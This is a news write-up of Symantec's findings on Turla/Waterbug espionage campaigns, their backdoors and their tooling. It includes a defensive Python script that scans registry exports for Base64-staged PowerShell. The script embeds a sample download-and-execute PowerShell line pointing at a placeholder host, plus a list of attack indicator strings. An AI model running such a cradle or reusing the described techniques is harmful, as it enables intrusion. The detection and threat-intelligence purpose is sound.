Symantec: Waterbug (aka Turla) is using a new toolset to attack governments and organizations in three malware campaigns: one with Neptun, a second with a modified version of Meterpreter and a third with a custom RPC backdoor
The Waterbug cyber espionage group (aka Turla) is targeting governments and international organizations with a series of campaigns that have featured a rapidly evolving toolset and, in one instance, the apparent hijacking of another espionage group’s infrastructure. The activity was discovered by Symantec’s cyber security researchers. Recent Waterbug activity can be divided into three distinct campaigns, each characterized by a different toolset. The first involved a new and previously unseen backdoor called Neptun (Backdoor.Whisperer). The second used Meterpreter, a publicly available backdoor, along with two custom loaders, a custom backdoor called photobased.dll, and a custom Remote Procedure Call (RPC) backdoor. In the third, the attackers deployed a different custom RPC backdoor from the one used in the second campaign.
Some details on the three malware campaigns
According to the researchers, in the first campaign Waterbug installed Neptun on Microsoft Exchange servers. Neptun is designed to listen passively for commands from the attackers instead of initiating connections to them, a capability that makes the malware more difficult to detect. Neptun is also able to download additional tools, upload stolen files, and execute shell commands. One attack during this campaign involved the use of infrastructure belonging to another espionage group known as Crambus (aka OilRig, APT34). In the second campaign, the attackers (who have used Meterpreter since at least early 2018) deployed a modified version of the backdoor that was encoded and given a .wav extension in order to disguise its true purpose. In the third campaign, the backdoor used code derived from the publicly available PowerShellRunner tool to execute PowerShell scripts without invoking powershell.exe, a technique designed to bypass detections aimed at identifying malicious use of that process. Prior to execution, the scripts were stored Base64-encoded in the registry, probably to avoid writing them to the file system.
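As an added illustration (not code from Symantec’s report or from this article), the following Python sketch shows how a responder could hunt for the registry-staging technique described above: it parses a registry export in .reg syntax, finds string values that decode from Base64 to printable text, and flags those containing common PowerShell indicators. The hive path, value names and the staged one-liner are constructed for the demo and are not indicators from the report; the list of indicator strings is an assumption of what a hunt would look for.

```python
import base64
import binascii
import re
import string

# Constructed sample for the demo. "Payload" is built by Base64-encoding a
# short PowerShell one-liner, the way the article describes scripts being
# staged in the registry; "Logo" is the Base64 of a PNG header (benign binary);
# the other values are ordinary strings. None of this is from the report.
_STAGED_SCRIPT = (
    "$c = New-Object Net.WebClient; "
    "Invoke-Expression $c.DownloadString('http://example.invalid/a.ps1')"
)
_STAGED_B64 = base64.b64encode(_STAGED_SCRIPT.encode("utf-8")).decode("ascii")

SAMPLE_REG_EXPORT = "\n".join([
    r"[HKEY_LOCAL_MACHINE\SOFTWARE\Example\Config]",
    r'"InstallPath"="C:\\Program Files\\Example"',
    f'"Payload"="{_STAGED_B64}"',
    r'"Logo"="iVBORw0KGgoAAAANSUhEUgAAAAEAAAAB"',
    r'"Note"="Base64 is also used for benign settings"',
])

# Only REG_SZ values of the form "Name"="Value" are parsed; hex(...) binary
# values are out of scope for this sketch.
_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
_B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
# Assumed indicator list: strings that commonly appear in staged PowerShell.
_PS_INDICATORS = re.compile(
    r"Invoke-Expression|\bIEX\b|New-Object|DownloadString|DownloadFile|"
    r"FromBase64String|Net\.WebClient|Invoke-WebRequest|Start-Process|"
    r"-EncodedCommand|\$env:",
    re.IGNORECASE,
)


def parse_reg_export(text):
    """Return {key\\valuename: string} for every REG_SZ value in a .reg export."""
    values = {}
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = _VALUE_RE.match(line)
        if m and key is not None:
            # .reg escapes backslashes and quotes; undo that.
            name, value = (
                s.replace('\\"', '"').replace("\\\\", "\\") for s in m.groups()
            )
            values[key + "\\" + name] = value
    return values


def decode_base64_text(value):
    """Decode a Base64 string to text, or return None if it is not Base64 or
    does not decode to printable text. UTF-8 is tried first, then UTF-16-LE
    (what powershell.exe -EncodedCommand expects), so either staging style
    is caught; binary blobs such as images are rejected."""
    if len(value) % 4 != 0 or not _B64_RE.fullmatch(value):
        return None
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    for encoding in ("utf-8", "utf-16-le"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if text and all(ch in string.printable for ch in text):
            return text
    return None


def powershell_indicators(text):
    """Distinct indicator strings found in the decoded text, in order seen."""
    seen = []
    for match in _PS_INDICATORS.findall(text):
        if match not in seen:
            seen.append(match)
    return seen


def scan_registry_values(values):
    """Flag values that decode from Base64 to text containing PowerShell indicators."""
    findings = []
    for path, value in values.items():
        text = decode_base64_text(value)
        if text is None:
            continue
        indicators = powershell_indicators(text)
        if indicators:
            findings.append({"path": path, "indicators": indicators, "script": text})
    return findings


def scan_reg_export(text):
    return scan_registry_values(parse_reg_export(text))


if __name__ == "__main__":
    for f in scan_reg_export(SAMPLE_REG_EXPORT):
        print(f"{f['path']}: {', '.join(f['indicators'])}\n    {f['script']}")
```

On a live system the input would come from `reg export` of the hives of interest; the same scan can be pointed at offline hive exports collected during incident response. Long alphanumeric strings such as GUIDs or hashes also match the Base64 pattern, which is why the decoded text must additionally be printable and contain an indicator before a value is flagged.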
The cyber security experts: the new toolset used by Waterbug for cyber espionage purposes
Waterbug’s most recent campaigns have involved a swathe of new tools, including custom malware, modified versions of publicly available hacking tools, and legitimate administration utilities. According to Symantec, the group has also followed the current shift towards “living off the land,” making use of PowerShell scripts and PsExec, a Microsoft Sysinternals tool for executing processes on other systems. The group also deployed: a new custom dropper, typically used to install Neptun as a service; a custom hacking tool that combines four leaked Equation Group tools (EternalBlue, EternalRomance, DoublePulsar and SMBTouch) into a single executable; a USB data collection tool that checks for a connected USB drive, steals certain file types and encrypts them into a RAR archive, which it then uploads to a Box cloud drive over WebDAV; Visual Basic scripts that perform system reconnaissance after initial infection and send the results to Waterbug command and control (C&C) servers; PowerShell scripts that perform system reconnaissance and steal credentials from Windows Credential Manager before sending this information back to Waterbug C&C servers; and publicly available tools such as IntelliAdmin to execute RPC commands, SScan and NBTScan for network reconnaissance, PsExec for execution and lateral movement, Mimikatz (Hacktool.Mimikatz) for credential theft, and certutil.exe to download and decode remote files. These tools were observed being downloaded via Waterbug tools or infrastructure.